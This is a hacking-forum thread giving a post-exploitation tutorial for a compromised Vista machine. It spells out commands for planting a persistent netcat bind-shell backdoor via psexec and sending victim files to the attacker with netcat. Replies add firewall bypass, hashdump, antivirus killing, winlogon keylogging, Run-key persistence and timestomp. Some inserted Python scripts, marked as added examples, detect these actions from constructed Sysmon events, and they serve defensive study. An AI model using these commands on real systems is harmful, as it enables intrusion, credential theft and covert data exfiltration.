
Thread: How to transfer files from vista to BT3 after exploitation

  1. #1
    kazalku (Member)
    Join Date: Feb 2009
    Posts: 416

    How to transfer files from vista to BT3 after exploitation

    This 'Howto' is written to explain post-exploitation file transfers from a Vista box to a BT3 box.
    This process doesn't work if the Windows firewall is on. Somebody has to research and find a way to turn it off during the meterpreter session.

    I'm assuming that:
    1) You are testing this with your own machines or you have permission to penetrate the Vista box.
    2) You've already got a meterpreter session running. If not, maybe this one can help: http://forums.remote-exploit.org/showthread.php?t=19129
    3) You've downloaded nc (netcat) for Windows. If not, download: http://joncraton.org/media/files/nc111nt.zip
    4) You've downloaded psexec.exe to execute processes remotely. If not, download: http://download.sysinternals.com/Files/PsTools.zip

    Now we've got our tools. Let's start by uploading the required files. They can be uploaded to the root folder, or you can make a new folder with the mkdir command. Say we want to upload our files to the c:\xxx folder of the victim (Vista) box. So, go to the C drive & prepare the folder:
    Code:
    cd c:\
    mkdir xxx
    ls
    cd xxx
    The ls will show you that the folder has been created.
    Open the root directory of the BT3 box and unzip the nc111nt.zip & PsTools.zip files.

    Uploading the files
    We just need 2 files. Upload them:
    Code:
    upload /root/nc111nt/nc.exe nc.exe
    upload /root/PsTools/psexec.exe psexec.exe
    ls
    The ls will show you that the files have been uploaded.

    Opening the backdoor
    Open a command shell by entering this at the meterpreter prompt:
    Code:
    execute -f cmd.exe -c -H -i
    Run nc & keep it running (that's our backdoor) to keep port 8888 open:
    Code:
    psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 8888
    Here, username & password are the admin username & password of the Vista box. You should already know these (coz you own the box, don't you?). In the real world, it's possible to crack these, but that is not covered in this tut.

    Using backdoor to transfer file
    OK... now that we've got our door, you can press Ctrl+C to terminate the command shell & then type exit to close the meterpreter session. Open a fresh konsole & use telnet to connect to the victim anytime:
    Code:
    telnet 192.168.x.x 8888
    Here 192.168.x.x is the victim's IP address. In my case, it's 192.168.1.2.

    You should see:
    Trying 192.168.1.2...
    Connected to 192.168.1.2.
    Escape character is '^]'.
    Microsoft Windows [Version 6.0.6001]
    Copyright (c) 2006 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>
    We will call this the "Shell".

    Files can be transferred from any location on the Vista box to any location on the BT3 box as long as the correct file path is provided.
    To receive the xxxx.txt file into the yyyy directory under root on the BT3 box, first prepare the BT3 box. Open another konsole & enter:
    Code:
    nc -vv -l -p 10000 > /root/yyyy/xxxx.txt
    Now, to send the file from the zzzz folder on the C drive of the Vista box, go to the "Shell" & enter:
    Code:
    nc 192.168.y.y 10000 < C:\zzzz\xxxx.txt
    Here, 192.168.y.y is the BT3 box (attacker) IP address.

    The file should be downloaded to the desired folder.
    ENJOY!!!!!!!!!!

    Reference:
    http://linux.byexamples.com/archives...e-with-netcat/
    http://forums.remote-exploit.org/showthread.php?t=20858
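    From the defender's side, the procedure in this post leaves a recognisable trail: a process started by the PsExec service, a netcat process listening with an exec flag that points at cmd.exe, a shell whose parent is netcat, and netcat opening a connection outward for the file copy. The following detection logic is an added example and is not part of the thread; it runs over constructed Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) records whose field names follow Sysmon and whose paths, addresses and ports are all made up.

```python
"""Detection rules for a PsExec-launched netcat bind shell and a netcat
file transfer, run over constructed Sysmon-style events (added example;
field names follow Sysmon, every path, address and port is made up)."""
import re

NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
PSEXEC_SERVICE = "psexesvc.exe"  # service binary PsExec installs on the target

# Constructed sample events: EventID 1 = process create, EventID 3 = network connect.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\xxx\psexec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"psexec.exe \\127.0.0.1 -u admin -p **** c:\xxx\nc.exe -L -d -e cmd.exe -p 8888"},
    {"EventID": 1, "Image": r"C:\xxx\nc.exe",
     "ParentImage": r"C:\Windows\PSEXESVC.exe",
     "CommandLine": r"c:\xxx\nc.exe -L -d -e cmd.exe -p 8888"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\xxx\nc.exe", "CommandLine": "cmd.exe"},
    {"EventID": 3, "Image": r"C:\xxx\nc.exe", "Initiated": "false",
     "SourceIp": "192.168.1.50", "SourcePort": 51234,
     "DestinationIp": "192.168.1.2", "DestinationPort": 8888},
    {"EventID": 1, "Image": r"C:\xxx\nc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nc 192.168.1.50 10000"},  # cmd.exe consumes the "< file" redirect
    {"EventID": 3, "Image": r"C:\xxx\nc.exe", "Initiated": "true",
     "SourceIp": "192.168.1.2", "SourcePort": 49876,
     "DestinationIp": "192.168.1.50", "DestinationPort": 10000},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",  # benign noise
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\a\todo.txt"},
]


def basename(path):
    """Last path component, lower-cased; accepts both \\ and / separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def short_flags(cmdline):
    """Set of single-letter options, so '-Ldp' and '-L -d -p' read the same.
    Whitespace splitting is enough for these samples; real Windows command
    lines with quoted paths need CommandLineToArgvW-style parsing."""
    flags = set()
    for tok in cmdline.split():
        if tok.startswith("-") and tok[1:].isalpha():
            flags.update(tok[1:].lower())
    return flags


def is_netcat_bind_shell(cmdline):
    """Listen flag plus an exec flag, with an interactive shell on the line."""
    flags = short_flags(cmdline)
    spawns_shell = any(basename(t) in SHELLS for t in cmdline.split())
    return "l" in flags and ("e" in flags or "c" in flags) and spawns_shell


def analyze(events):
    """Return (rule, detail) pairs for every event that matches a rule."""
    findings = []
    for ev in events:
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        if ev["EventID"] == 1:
            cmd = ev.get("CommandLine", "")
            if image in NETCAT_NAMES and is_netcat_bind_shell(cmd):
                findings.append(("netcat_bind_shell", cmd))
            if parent == PSEXEC_SERVICE:
                findings.append(("psexec_service_child", f"{image} started by {parent}"))
            if parent in NETCAT_NAMES and image in SHELLS:
                findings.append(("shell_spawned_by_netcat", f"{image} child of {parent}"))
        elif ev["EventID"] == 3 and image in NETCAT_NAMES:
            # Sysmon: Initiated=true means this host opened the connection.
            if str(ev.get("Initiated", "")).lower() == "true":
                findings.append(("netcat_outbound_connection",
                                 f"to {ev['DestinationIp']}:{ev['DestinationPort']}"))
            else:
                findings.append(("netcat_inbound_connection",
                                 f"from {ev['SourceIp']}:{ev['SourcePort']} "
                                 f"on local port {ev['DestinationPort']}"))
    return findings


if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
```

    The listener event and the outbound connection are reported separately on purpose: a netcat binary accepting a connection is the backdoor itself, while the same binary initiating a connection to port 10000 a moment later is the file leaving the host, and an analyst wants both timestamps.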

  2. #2
    X-Ray Cat (Just burned his ISO)
    Join Date: Feb 2009
    Posts: 3

    Thanks, very good tutorial

  3. #3
    kazalku (Member)
    Join Date: Feb 2009
    Posts: 416

    Quote Originally Posted by X-Ray Cat
    Thanks, very good tutorial
    You are most welcome. I posted this tut a while ago and didn't get any response at all, so I assumed that I did something sh*tty.

  4. #4
    s@my_ (Just burned his ISO)
    Join Date: Dec 2008
    Posts: 4

    I usually use the TFTP server to download or upload files on the victim machine.
    I want to know how to download not only a file but also a directory from a victim machine, using netcat or the TFTP server.
    If it is possible, please tell me how.

  5. #5
    kazalku (Member)
    Join Date: Feb 2009
    Posts: 416

    Quote Originally Posted by s@my_
    I usually use the TFTP server to download or upload files on the victim machine.
    I want to know how to download not only a file but also a directory from a victim machine, using netcat or the TFTP server.
    If it is possible, please tell me how.
    Well, there may be other ways, but I like to do it as follows:
    1. Download PKZIP 2.04 (93.02.01) PKZIP.EXE (42 KB) from http://www.uv.tietgen.dk/staff/mlha/Download/dos/
    2. Upload it to the xxx folder on the victim box:
      Code:
      upload /root/pkzip.exe pkzip.exe
    3. Then, if your purpose is to download the "test" folder from the victim box, compress it to make a zip file:
      Code:
      pkzip.exe test.zip c:\test\*.*
    4. Then just follow the file transfer procedure to download it to the BT box.

    Hope that it's clear....

  6. #6
    s@my_ (Just burned his ISO)
    Join Date: Dec 2008
    Posts: 4

    Very clear, thank you kazalku for this solution.
    Tomorrow Can Be Too Late

  7. #7
    kazalku (Member)
    Join Date: Feb 2009
    Posts: 416

    Glad to be of help

  8. #8
    Member
    Join Date: Jun 2008
    Posts: 101

    Bypassing Firewall

    Let's add some more ingredients to the soup.

    In case a Windows firewall is in place, we can do the following to bypass it:

    Code:
    C:\>netsh firewall set allowedprogram %systemroot%\system32\nc.exe
    In this case, nc.exe was placed in the system32 directory. You can also disable the firewall altogether, as well as opening particular ports. Try the help menu, which is really good!

    Code:
    netsh firewall set /?
    Enjoy!
    QuadCore AMD Phenom X4 9950, 2600 MHz
    8GB DDR2 800MHz
    Dual Boot System: Windows Server 2008 x64 w/ Hyper-V, Ubuntu 9.10 x64

  9. #9
    kazalku (Member)
    Join Date: Feb 2009
    Posts: 416

    I was too lazy to add this........
    Cheers mate
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  10. #10

    hi,

    just curious, you have already exploited the box with msf3 - so just a stupid question, but why not use msf3 to transfer files and use a reverse shell/portfwd to avoid firewall issues (of course, if you don't wanna have an additional backdoor with nc)?


    some nifty other things to do on the (wind0ws) target:

    meterpreter > use priv <<<<needed for timestomp & hashdump
    meterpreter > run getgui
    meterpreter > run killav
    meterpreter > run winenum
    meterpreter > hashdump
    meterpreter > ps <<<<get a list of running processes which could be then used for the migrate command

    using the keylogger function (you have to look for the winlogon.exe process id and migrate your session to this id)
    meterpreter > migrate {winlogon.exe process id}
    meterpreter > keyscan_start <<<<now you have to wait until the user logs in and types in something..
    meterpreter > keyscan_dump

    manipulating the firewall is also possible with the msf3 built-in reg function:

    meterpreter > reg setval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v nc -d "C:\Windows\system32\nc.exe:*:Enabled:nc"

    if you don't wanna use psexec, you can also use msf3 to do this:

    reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\\windows\\system32\\nc.exe -Ldp 8888 -e cmd.exe"

    changing file times is also not a bad thing to do:

    meterpreter > timestomp C:\\windows\\system32\\nc.exe -f C:\\windows\\system32\\cmd.exe

    if you don't want to take the extra step of uploading netcat - just use the msf3 port forwarding:

    meterpreter> portfwd -a -L 127.0.0.1 -l 446 -h schaeuble.bnd.de -p 3389
    ;-))


    Great scripts for msf3 can be found here:
    hxxp://www[.]darkoperator[.]com/meterpreter/


    /brtw2003
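    Post #8 (netsh firewall set allowedprogram) and this post (the AuthorizedApplications\List registry value, the Run-key entry that restarts nc.exe, and timestomp on nc.exe) all touch things a host sensor records directly. The detection logic below is an added example, not part of the thread; it runs over constructed Sysmon-style events (EventID 1 process creation, EventID 13 registry value set, EventID 2 file creation time changed) whose field names follow Sysmon and whose paths, times and values are made up.

```python
"""Detection rules for firewall allow-list edits, Run-key persistence and
backdated file creation times, run over constructed Sysmon-style events
(added example; field names follow Sysmon, all values are made up)."""
import re
from datetime import datetime

FW_ALLOWLIST_RE = re.compile(
    r"\\sharedaccess\\parameters\\firewallpolicy\\[^\\]+\\authorizedapplications\\list\\", re.I)
RUN_KEY_RE = re.compile(r"\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)
NETSH_FW_RE = re.compile(r"\bfirewall\b.*\b(set|add)\s+(allowedprogram|portopening|opmode)\b", re.I)
# Tool names and "execute a shell" flags that turn a routine change into a high-severity one.
SUSPICIOUS_RE = re.compile(r"\b(nc|nc64|ncat|netcat)(\.exe)?\b|-[a-z]*e\s+(cmd|powershell)(\.exe)?", re.I)
SYSMON_TIME = "%Y-%m-%d %H:%M:%S.%f"  # Sysmon UtcTime layout

# Constructed sample events; the payload process path is a placeholder.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": r"netsh firewall set allowedprogram C:\Windows\system32\nc.exe"},
    {"EventID": 13, "Image": r"C:\xxx\payload.exe",
     "TargetObject": r"HKLM\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy"
                     r"\StandardProfile\AuthorizedApplications\List\nc",
     "Details": r"C:\Windows\system32\nc.exe:*:Enabled:nc"},
    {"EventID": 13, "Image": r"C:\xxx\payload.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nc",
     "Details": r"C:\windows\system32\nc.exe -Ldp 8888 -e cmd.exe"},
    {"EventID": 2, "Image": r"C:\xxx\payload.exe",
     "TargetFilename": r"C:\Windows\system32\nc.exe",
     "CreationUtcTime": "2006-11-02 09:45:11.000",          # copied from cmd.exe
     "PreviousCreationUtcTime": "2009-03-04 18:20:33.000"},  # when nc.exe really arrived
    {"EventID": 13, "Image": r"C:\Program Files\Acme\setup.exe",  # benign installer
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\AcmeTray",
     "Details": r'"C:\Program Files\Acme\tray.exe" /silent'},
]


def severity(text):
    """'high' when a known tool name or shell-exec flag appears, else 'info'."""
    return "high" if SUSPICIOUS_RE.search(text) else "info"


def analyze(events):
    """Return (rule, severity, detail) triples for every matching event."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 1 and ev["Image"].lower().endswith("netsh.exe"):
            cmd = ev["CommandLine"]
            if NETSH_FW_RE.search(cmd):
                findings.append(("netsh_firewall_change", severity(cmd), cmd))
        elif eid == 13:
            key, val = ev["TargetObject"], ev["Details"]
            if FW_ALLOWLIST_RE.search(key):
                # Value layout: <path>:<scope>:Enabled|Disabled:<display name>.
                # rsplit keeps the drive-letter colon inside the path.
                path, scope, state, _name = (val.rsplit(":", 3) + ["", "", ""])[:4]
                sev = "high" if state.lower() == "enabled" and SUSPICIOUS_RE.search(path) else "medium"
                findings.append(("firewall_allowlist_entry", sev, f"{path} ({state}, scope {scope})"))
            elif RUN_KEY_RE.search(key):
                findings.append(("run_key_modified", severity(val), f"{key} = {val}"))
        elif eid == 2:
            new = datetime.strptime(ev["CreationUtcTime"], SYSMON_TIME)
            old = datetime.strptime(ev["PreviousCreationUtcTime"], SYSMON_TIME)
            if new < old:  # creation time moved into the past: classic timestomp signal
                findings.append(("file_creation_time_backdated", "high",
                                 f"{ev['TargetFilename']}: {old:%Y-%m-%d} -> {new:%Y-%m-%d}"))
    return findings


if __name__ == "__main__":
    for rule, sev, detail in analyze(SAMPLE_EVENTS):
        print(f"[{sev:6}] {rule:30} {detail}")
```

    Every allow-list entry is reported, at medium severity for an unknown program and high when the path names a netcat-style tool; the Run-key rule works the same way, so the installer's tray application in the sample is logged at info level rather than dropped. The backdating check only needs the two creation times Sysmon carries in the event; it does not depend on knowing which file the times were copied from.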

